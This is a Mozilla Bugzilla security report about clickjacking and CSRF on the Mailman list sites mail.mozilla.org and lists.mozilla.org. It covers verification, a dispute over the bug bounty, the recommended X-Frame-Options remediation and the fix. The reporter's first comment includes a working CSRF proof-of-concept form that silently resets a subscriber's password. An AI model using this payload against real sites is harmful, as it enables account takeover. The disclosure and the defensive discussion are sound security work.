Closed Bug 909874 Opened 12 years ago Closed 9 years ago

Clickjacking on mail.mozilla.org and lists.mozilla.org (mailman sites need X-Frame-Options)

Categories

(Infrastructure & Operations :: Infrastructure: Mail, task)

Product:
Infrastructure & Operations
Component:
Infrastructure: Mail
Type:
task
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: bhattacharya.manish7, Unassigned)

References

(
URL
)

Details

(Keywords: reporter-external, sec-low, wsec-headers, Whiteboard: CSRF part covered by bug 890063 [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org])

Attachments

(1 file)

test1.html is for csrf and page can be opened in iframe
623 bytes, text/plain
Details
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release) Build ID: 20130814063812 Steps to reproduce: https://mail.mozilla.org/options/mozwebqa/bhattacharya.manish7@gmail.com open in iframe and used the following code to reset my password : <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Untitled Document</title> </head> <body> <form method="post" name="test" action="https://mail.mozilla.org/options/mozwebqa/bhattacharya.manish7@gmail.com"> <input type="hidden" value="hello123" name="newpw" /> <input type="hidden" value="hello123" name="confpw" /> </form> <script type="text/javascript"> document.test.submit(); </script> </body> </html> as some emails are public in the mail.mozilla.org , hence attack can be generalised. Actual results: page opened in iframe as well as i got password change mail. Expected results: there should be a x-frame header on page like this where u dnt ask for old password and change by just asking password and new password , and should be a csrf token with the form submitted.
assigned to adam for verificaiton
Assignee: nobody → amuntner
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Checking this one out. I wasn't subscribed to any lists so i just subbed to one, once I have approval to join I'll be able to verify.
URL: https://mail.mozilla.org/options/
Whiteboard: [reporter-external][verif?] → [reporter-external][site:mail.mozilla.org][verif?]
Thanks Manish! Verified. Remediation: To prevent CSRF framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Asking for the password before allowing it to be changed, also a good idea.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: wsec-csrf
Whiteboard: [reporter-external][site:mail.mozilla.org][verif?] → [reporter-external][site:mail.mozilla.org]
Assignee: amuntner → nobody
Group: mozilla-services-security → websites-security
Component: General → Other
Product: Mozilla Services → Websites
Assignee: nobody → infra
Component: Other → Infrastructure: Mail
Product: Websites → Infrastructure & Operations
QA Contact: limed
Version: unspecified → other
This is obviously a mailman bug... has this been reported to them yet?
yes ! i reported them and it has been verified .
next obvious question then, is is there an upstream patch for it yet?
Flags: pending-upstream-fix+
adam and me suggested the patch , but don't know it has been implemented or not !
any update on the issue, am curious about bounty(?)..hope for the best :)
somebody please ! look into this,resolve the issue and update me
There was a new RC release of Mailman 2.x this weekend, but I don't see that on the release notes.
what happened with bug bounty ??
Adam: which attack did you verify? I don't see where clickjacking comes into this. And if the form is CSRF-able why would you have to load it in a frame?
Flags: needinfo?(amuntner)
Keywords: sec-moderate
Daniel: i reported clickjacking and csrf as independent issues, both were there at the time of reporting.
it has been 2 months since the bug was reported , please resolve the issue and update the bounty flag.it is a humble request. regards Manish
I think it's waiting on dveditz to confirm if you sufficiently answered his question or not.
Flags: needinfo?(dveditz)
i replied to dveditz, clickjacking and CSRF were two different issues and both has been verified at the time of reporting.But still no response :(
(In reply to Manish Bhattacharya from comment #16) > i replied to dveditz, clickjacking and CSRF were two different issues and > both has been verified at the time of reporting.But still no response :( Right, but he didn't reply yet saying if he saw that and if that was a sufficient answer.
(In reply to Dave Miller [:justdave] (justdave@bugzilla.org) from comment #17) > (In reply to Manish Bhattacharya from comment #16) > > i replied to dveditz, clickjacking and CSRF were two different issues and > > both has been verified at the time of reporting.But still no response :( > > Right, but he didn't reply yet saying if he saw that and if that was a > sufficient answer. what should i do now ? or just wait for his reply
(In reply to Manish Bhattacharya from comment #5) > yes ! i reported them and it has been verified . Mailman 2.1.16 was just released today, and I don't see any indication of any security content in it.
dveditz - to answer https://bugzilla.mozilla.org/show_bug.cgi?id=909874#c12 it doesn't have to be loaded into a frame to execute the bug. Plain old CSRF works fine too.
Flags: needinfo?(amuntner)
My opinion is that this bug should be marked as a duplicate of https://bugzilla.mozilla.org/show_bug.cgi?id=890063
great, first do nothing with the report for months then mark it duplicate , when i reported and it got verified , where was this 80063, can i see that ?
(In reply to Adam Muntner :adamm from comment #21) > My opinion is that this bug should be marked as a duplicate of > https://bugzilla.mozilla.org/show_bug.cgi?id=890063 there are two issues csrf and clickjacking, both are duplicate ?
please somebody, update the case and flags associated :)
Severity: normal → major
Please do not bump bug severity, there is a needinfo flag for :dveditz and we are just waiting on info, nothing more to do here but wait for his response
Severity: major → normal
its been more than a month , am still waiting :(
The more serious problem, the csrf, is a duplicate of bug 890063 which I've CC'd you on. You never answered my question about clickjacking but the only attackable control I see is the unsubscribe button. That would be an annoying Denial of Service so we should fix it (by preventing framing) but would not be worth a bug bounty.
Flags: sec-bounty?
Flags: sec-bounty-
Flags: needinfo?(dveditz)
Keywords: sec-moderate, wsec-csrfsec-low, wsec-dos
Summary: csrf and clickjacking on mail.mozilla.org → unsubscribe clickjacking on mail.mozilla.org (mailman sites need X-Frame-Options)
Whiteboard: [reporter-external][site:mail.mozilla.org] → [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org]
Whiteboard: [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org] → CSRF part covered by bug 890063 [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org]
There's also a confirmation step on the unsubscribe button because the options page is (usually) unauthenticated.
but just because you guys use same software over two sites, that means its duplicate ? please ! i reported on other domain so technically i deserve something, really disappointing and i replied to all your messages.
Yes, the mailman installations on our newsgroups/lists gateway (lists.mozilla.org, 63.245.216.66) and our non-gatewayed lists (mail.mozilla.org, 63.245.216.65) are managed as a unit. Since the problem is in the upstream mailman code and not in a per-site configuration setting they are duplicate issues. This bug does not qualify for the bug bounty on that basis. It's also not on our list of sites participating in the bug bounty program, which is primarily focused on the sites and services that would affect millions of Firefox users rather than the developers served by our mailing lisits. http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs The "extraordinary" bugs referred to in the section below the list are generally ones that compromise the machine itself, not bugs in the web app (otherwise the site would be listed).
Summary: unsubscribe clickjacking on mail.mozilla.org (mailman sites need X-Frame-Options) → Clickjacking on mail.mozilla.org and lists.mozilla.org (mailman sites need X-Frame-Options)
There is still no default XFO setting in Mailman 2.1.22, so presumably nobody has told them and/or none of their development team cares. I will open up a bug to implement XFO on these two sites.
yes april please
Depends on: 1287197
Fixed in bug 1287197.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Group: websites-security
Keywords: wsec-doswsec-headers
great april
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: